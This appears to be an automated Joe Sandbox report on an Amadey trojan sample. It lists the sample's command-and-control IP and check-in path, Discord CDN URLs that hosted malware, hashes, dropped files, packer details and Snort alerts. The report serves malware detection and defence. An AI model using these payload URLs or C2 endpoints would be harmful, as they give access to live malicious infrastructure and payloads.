                        Classification:mal100.troj.evad.winEXE@13/6@2/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 100% (good quality ratio 60%)
                        • Quality average: 56.4%
                        • Quality standard deviation: 46.5%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        22:23:06API Interceptor3071x Sleep call for process: rnyuf.exe modified
                        22:23:08Task SchedulerRun new task: rnyuf.exe path: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        178.208.83.45BFSdrqaAvS.exeGet hashmaliciousBrowse
                        • depressionk1d.ug/k8FppT/index.php
                        We7WnoqeXe.exeGet hashmaliciousBrowse
                        • depressionk1d.ug/k8FppT/index.php
                        k0nAx7VQ5T.exeGet hashmaliciousBrowse
                        • depressionk1d.ug/k8FppT/index.php
                        162.159.129.2331PhgF7ujwW.exeGet hashmaliciousBrowse
                        • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                        vhNyVU8USk.exeGet hashmaliciousBrowse
                        • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                        Order 4503860408.exeGet hashmaliciousBrowse
                        • cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
                        cotizacin.docGet hashmaliciousBrowse
                        • cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
                        SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exeGet hashmaliciousBrowse
                        • cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
                        7G5RoevPnu.exeGet hashmaliciousBrowse
                        • cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
                        70% Balance Payment.docGet hashmaliciousBrowse
                        • cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
                        TT20201712.docGet hashmaliciousBrowse
                        • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                        ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousBrowse
                        • cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        depressionk1d.ugBFSdrqaAvS.exeGet hashmaliciousBrowse
                        • 178.208.83.45
                        We7WnoqeXe.exeGet hashmaliciousBrowse
                        • 178.208.83.45
                        k0nAx7VQ5T.exeGet hashmaliciousBrowse
                        • 178.208.83.45
                        HEWFj6cmsN.exeGet hashmaliciousBrowse
                        • 178.208.83.23
                        VunjeCGYgU.exeGet hashmaliciousBrowse
                        • 193.164.17.17
                        X2PrdXhH1y.exeGet hashmaliciousBrowse
                        • 193.164.17.17
                        cdn.discordapp.comwLkXgpl9MJ.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        bzQrim04c8.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        SF45gO3Bc8.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        3B0jZOP3Ou.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        sorZ4F1PRC.exeGet hashmaliciousBrowse
                        • 162.159.133.233
                        TutoxSXknF.exeGet hashmaliciousBrowse
                        • 162.159.133.233
                        GwGRsPZJO7.exeGet hashmaliciousBrowse
                        • 162.159.133.233
                        GhlYvtlwHA.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        WSWw3rqaqL.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        33CBD9E39DD39A84D0426897605B17000046E0FB14399.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        annexedpayment.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        Desync.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        ORDER PO#188827-003201.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        Files_1160_QVRsvGhHM.exeGet hashmaliciousBrowse
                        • 162.159.130.233
                        20211111.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        H7e3LrSfbu.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        66155486f7e22faf23329dcc1cf5f1b157e48740fd2b6.exeGet hashmaliciousBrowse
                        • 162.159.135.233
                        aqD3YDu4tK.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        SAMPLE.SPECIFICATION.ORDER.PDF.Gz.exeGet hashmaliciousBrowse
                        • 162.159.135.233
                        Quotation 14000145971.docGet hashmaliciousBrowse
                        • 162.159.133.233

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        CLOUDFLARENETUSPO 210411.xlsxGet hashmaliciousBrowse
                        • 23.227.38.74
                        1182021-becky.sias@trustvesta.com_531 AM65Application.HTMGet hashmaliciousBrowse
                        • 104.18.11.207
                        wLkXgpl9MJ.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        bzQrim04c8.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        [MALICIOUS]_Message768.htmlGet hashmaliciousBrowse
                        • 104.16.19.94
                        SF45gO3Bc8.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        3B0jZOP3Ou.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        Itoaamnygg.exeGet hashmaliciousBrowse
                        • 104.23.98.190
                        sorZ4F1PRC.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        TutoxSXknF.exeGet hashmaliciousBrowse
                        • 162.159.133.233
                        GwGRsPZJO7.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        GhlYvtlwHA.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        WSWw3rqaqL.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        33CBD9E39DD39A84D0426897605B17000046E0FB14399.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        annexedpayment.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        Remittance Note for communication-6fead40e9acadb856d9e6f06d97006c8fb0d@procoretech.com.htmlGet hashmaliciousBrowse
                        • 104.16.18.94
                        Desync.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        be.exeGet hashmaliciousBrowse
                        • 104.18.115.97
                        ORDER PO#188827-003201.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        Files_1160_QVRsvGhHM.exeGet hashmaliciousBrowse
                        • 162.159.130.233
                        VDSINA-ASRUBFSdrqaAvS.exeGet hashmaliciousBrowse
                        • 178.208.83.45
                        We7WnoqeXe.exeGet hashmaliciousBrowse
                        • 178.208.83.45
                        k0nAx7VQ5T.exeGet hashmaliciousBrowse
                        • 178.208.83.45
                        Aer0 Spoofer - Stable .exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        B2yykjc0vw.exeGet hashmaliciousBrowse
                        • 195.2.93.155
                        3qSjPmgRaH.exeGet hashmaliciousBrowse
                        • 62.113.112.212
                        7Pcm60Ph4W.exeGet hashmaliciousBrowse
                        • 109.234.39.186
                        doCid5nQUT.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        4Z4ryhTTPq.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        ciC1YFa7IG.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        1EtQDL6IYL.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        NDKWPFBYQL.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        CtwD7ApTS0.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        KM0ijCabt2.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        5EaGMo9cfx.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        3oJ5ECI1o6.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        Qpq22J14Xz.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        RyeZuiXz4C.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        k3B1mXKXI1.exeGet hashmaliciousBrowse
                        • 95.142.46.35
                        SecuriteInfo.com.FileRepMalware.2600.exeGet hashmaliciousBrowse
                        • 195.2.93.45

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        37f463bf4616ecd445d4a1937da06e191182021-becky.sias@trustvesta.com_531 AM65Application.HTMGet hashmaliciousBrowse
                        • 162.159.129.233
                        33CBD9E39DD39A84D0426897605B17000046E0FB14399.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        123.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        20211111.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        DocumentoOutubro-PT-624918-2019-10_47.vbsGet hashmaliciousBrowse
                        • 162.159.129.233
                        2xH9L2RB6W.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        version-1089326589.xlsGet hashmaliciousBrowse
                        • 162.159.129.233
                        version-1089402791.xlsGet hashmaliciousBrowse
                        • 162.159.129.233
                        tapkNGLb59.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        tapkNGLb59.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        KIP9z4BDru.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        keep-241168107.xlsGet hashmaliciousBrowse
                        • 162.159.129.233
                        X4V4jFmFhO.dllGet hashmaliciousBrowse
                        • 162.159.129.233
                        KIP9z4BDru.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        Divergencias.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        mar-signature_request.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        P-200 Signature Form.docGet hashmaliciousBrowse
                        • 162.159.129.233
                        Ihdwqmnb7s.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        Ihdwqmnb7s.exeGet hashmaliciousBrowse
                        • 162.159.129.233
                        Ty6KZlrpuG.dllGet hashmaliciousBrowse
                        • 162.159.129.233

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeWe7WnoqeXe.exeGet hashmaliciousBrowse

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vms[1].exe
                          Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5
                          Entropy (8bit):1.5219280948873621
                          Encrypted:false
                          SSDEEP:3:hn:h
                          MD5:FDA44910DEB1A460BE4AC5D56D61D837
                          SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                          SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                          SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview: 0....
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\slhost[1].exe
                          Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5
                          Entropy (8bit):1.5219280948873621
                          Encrypted:false
                          SSDEEP:3:hn:h
                          MD5:FDA44910DEB1A460BE4AC5D56D61D837
                          SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                          SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                          SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                          Malicious:false
                          Preview: 0....
                          C:\Users\user\AppData\Local\Temp\152138533219
                          Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                          Category:dropped
                          Size (bytes):106471
                          Entropy (8bit):7.9289651114839765
                          Encrypted:false
                          SSDEEP:1536:CFhZIAIfdWyGEOsz25MN50GHxNic9X7teelFCY1XQoHq/Pmi/I3iota/bNZ5WNp+:IhmhLD30GHTiUX8CFdAoHqXm7VaBAFU
                          MD5:AF0FF1B17AA527892B3BB58252764B4E
                          SHA1:76421F0BD9F6D8715BB727BA306DF1DB50B55B04
                          SHA-256:E2EC5FA75EE5FB378DC91055ADC8748DD944D7FBD7C244653871F5222659C0C6
                          SHA-512:389D9100C6801B5F21C7EBA13711C342A081B40FCA3EAD354CB4BA4D39C9B9284E16B92165D6D84C149F2A7488E5F46849BF046675EDA34BD052ACE6B2ABAB2E
                          Malicious:false
                          Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(.._.C.....B...-..h.Dh......{..J*.qNN...Z......?......................./.H.v..O.|......I"]Z...I.y..[
                          C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):2588967
                          Entropy (8bit):7.9559285316110975
                          Encrypted:false
                          SSDEEP:49152:7n/kTWwbJFn/319/caDkOUjFX10G53Mq1SA6DiW+rkdciAC+6Lh82j+7AcK:7n/atdNwjFXt5dB77t6Lhz+ccK
                          MD5:34CCA2013EB9B2941A65971919BF356D
                          SHA1:59F15A169B6C42340849A609EDB146E2F6614076
                          SHA-256:735D3E2EB44123FE560CE027B907B3B1494B0F926ACEB641DCDF428A21B8AAC0
                          SHA-512:258ECE4A4530B07D4B2840D44168CFD829C0E65D562D5B2E5E94281FFCA3DCF631B22799FD0C5EEFBD40249E72709DC2ACAF1FF99B5FEE0741C3DF942ABC2535
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 79%
                          Joe Sandbox View:
                          • Filename: We7WnoqeXe.exe, Detection: malicious, Browse
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................:........p....p....p...........:...>....>.X...>....Rich............................PE..L...F%.a.................^........... B......p....@.......................... h.....".'...@........................................................................................................................................................ V\......h".................. ..` 0....p..97...(..............@..@ tE...........`..............@... .....P.......b..............@..@ .....`..g....d..............@..B.imports.............~..............@....rsrc...............................@..@.themida..>.........................`....boot.....&.. B.'.%.................`..`................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\slhost\slhost.exe
                          Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          File Type:XML 1.0 document text
                          Category:dropped
                          Size (bytes):223
                          Entropy (8bit):4.745008847905136
                          Encrypted:false
                          SSDEEP:6:TM3i0b9ZjZvKtWRbtmdsfbPAxjqm1bANKvn:TM3i0b9BZKtWRbtmdsfbPAxjqSkNKv
                          MD5:A6A676051F857D516F6C4BEC595A7CFB
                          SHA1:10E7C48A109FFBE60FA7AB3585C4BD711942CBD2
                          SHA-256:98686E602B5F75BBCEB801CA315617579AD9FFE9E2DF66D49673EA35A7E1F343
                          SHA-512:DF302B28E5897BAC668AD1AE2B32D2424AF7C8CDF4527AC54EA268E6E9FBF41EFE28B236AF25CEACB5E5ACD95B6C99B8CF95FA735687358A265BD59E2B127BA6
                          Malicious:false
                          Preview: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>
                          C:\Users\user\AppData\Local\Temp\vms\vms.exe
                          Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          File Type:XML 1.0 document text
                          Category:dropped
                          Size (bytes):223
                          Entropy (8bit):4.745008847905136
                          Encrypted:false
                          SSDEEP:6:TM3i0b9ZjZvKtWRbtmdsfbPAxjqm1bANKvn:TM3i0b9BZKtWRbtmdsfbPAxjqSkNKv
                          MD5:A6A676051F857D516F6C4BEC595A7CFB
                          SHA1:10E7C48A109FFBE60FA7AB3585C4BD711942CBD2
                          SHA-256:98686E602B5F75BBCEB801CA315617579AD9FFE9E2DF66D49673EA35A7E1F343
                          SHA-512:DF302B28E5897BAC668AD1AE2B32D2424AF7C8CDF4527AC54EA268E6E9FBF41EFE28B236AF25CEACB5E5ACD95B6C99B8CF95FA735687358A265BD59E2B127BA6
                          Malicious:false
                          Preview: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.9559285316110975
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe
                          File size:2588967
                          MD5:34cca2013eb9b2941a65971919bf356d
                          SHA1:59f15a169b6c42340849a609edb146e2f6614076
                          SHA256:735d3e2eb44123fe560ce027b907b3b1494b0f926aceb641dcdf428a21b8aac0
                          SHA512:258ece4a4530b07d4b2840d44168cfd829c0e65d562d5b2e5e94281ffca3dcf631b22799fd0c5eefbd40249e72709dc2acaf1ff99b5fee0741c3df942abc2535
                          SSDEEP:49152:7n/kTWwbJFn/319/caDkOUjFX10G53Mq1SA6DiW+rkdciAC+6Lh82j+7AcK:7n/atdNwjFXt5dB77t6Lhz+ccK
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................:...........p.......p.......p...................:...>.......>.X.....>.......Rich...................

                          File Icon

                          Icon Hash:00828e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x8220b0
                          Entrypoint Section:.boot
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x611D2546 [Wed Aug 18 15:20:38 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:2e7ed61bfc3c595a7fd3b61147b94a67

                          Entrypoint Preview

                          Instruction
                          call 00007F0D78DECFE0h
                          push ebx
                          mov ebx, esp
                          push ebx
                          mov esi, dword ptr [ebx+08h]
                          mov edi, dword ptr [ebx+10h]
                          cld
                          mov dl, 80h
                          mov al, byte ptr [esi]
                          inc esi
                          mov byte ptr [edi], al
                          inc edi
                          mov ebx, 00000002h
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          jnc 00007F0D78DECE7Ch
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          jnc 00007F0D78DECEE3h
                          xor eax, eax
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          jnc 00007F0D78DECF77h
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          adc eax, eax
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          adc eax, eax
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          adc eax, eax
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          adc eax, eax
                          je 00007F0D78DECE9Ah
                          push edi
                          mov eax, eax
                          sub edi, eax
                          mov al, byte ptr [edi]
                          pop edi
                          mov byte ptr [edi], al
                          inc edi
                          mov ebx, 00000002h
                          jmp 00007F0D78DECE2Bh
                          mov eax, 00000001h
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          adc eax, eax
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          jc 00007F0D78DECE7Ch
                          sub eax, ebx
                          mov ebx, 00000001h
                          jne 00007F0D78DECEBAh
                          mov ecx, 00000001h
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          adc ecx, ecx
                          add dl, dl
                          jne 00007F0D78DECE97h
                          mov dl, byte ptr [esi]
                          inc esi
                          adc dl, dl
                          jc 00007F0D78DECE7Ch
                          push esi
                          mov esi, edi
                          sub esi, ebp

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x380d30xdc.imports
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x390000x1d8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x25c560x12268False1.00041698052data7.97940314248IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          0x270000x83300x3739False1.00077810002data7.9408992561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          0x300000x45740x1f9False1.02178217822data7.53742703149IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          0x350000x1e00x10bFalse1.04119850187data7.15705679523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          0x360000x1ce40x1967False0.980931877595data7.88803235449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .imports0x380000x10000x200False0.46875data3.51116785455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .rsrc0x390000x10000x200False0.52734375data4.71767883295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .themida0x3a0000x3e80000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .boot0x4220000x2600000x25ff27unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_MANIFEST0x390580x17dXML 1.0 document textEnglishUnited States

                          Imports

                          DLLImport
                          kernel32.dllGetModuleHandleA
                          USER32.dllGetDC
                          GDI32.dllCreateCompatibleBitmap
                          ADVAPI32.dllRegQueryValueExA
                          SHELL32.dllShellExecuteA
                          WININET.dllHttpOpenRequestA
                          gdiplus.dllGdipSaveImageToFile

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          11/12/21-22:23:06.731543TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.4178.208.83.45
                          11/12/21-22:23:06.928394TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.4178.208.83.45
                          11/12/21-22:23:30.298165TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.4178.208.83.45
                          11/12/21-22:23:30.464189TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.4178.208.83.45
                          11/12/21-22:23:30.619368TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.4178.208.83.45
                          11/12/21-22:23:30.774305TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.4178.208.83.45
                          11/12/21-22:23:30.948812TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.4178.208.83.45
                          11/12/21-22:23:31.118265TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.4178.208.83.45
                          11/12/21-22:23:31.275063TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.4178.208.83.45
                          11/12/21-22:23:31.432216TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.4178.208.83.45
                          11/12/21-22:23:31.602646TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.4178.208.83.45
                          11/12/21-22:23:31.760157TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.4178.208.83.45
                          11/12/21-22:23:31.915644TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.4178.208.83.45
                          11/12/21-22:23:32.073917TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.4178.208.83.45
                          11/12/21-22:23:32.230894TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.4178.208.83.45
                          11/12/21-22:23:32.386088TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.4178.208.83.45
                          11/12/21-22:23:32.557030TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.4178.208.83.45
                          11/12/21-22:23:32.713207TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.4178.208.83.45
                          11/12/21-22:23:32.868107TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.4178.208.83.45
                          11/12/21-22:23:33.280977TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.4178.208.83.45
                          11/12/21-22:23:33.421954TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.4178.208.83.45
                          11/12/21-22:23:33.587182TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.4178.208.83.45
                          11/12/21-22:23:33.743364TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.4178.208.83.45
                          11/12/21-22:23:33.900875TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.4178.208.83.45
                          11/12/21-22:23:34.072470TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.4178.208.83.45
                          11/12/21-22:23:34.242914TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.4178.208.83.45
                          11/12/21-22:23:34.401584TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.4178.208.83.45
                          11/12/21-22:23:34.562715TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.4178.208.83.45
                          11/12/21-22:23:34.741552TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.4178.208.83.45
                          11/12/21-22:23:34.901584TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.4178.208.83.45
                          11/12/21-22:23:35.058315TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.4178.208.83.45
                          11/12/21-22:23:35.211416TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.4178.208.83.45
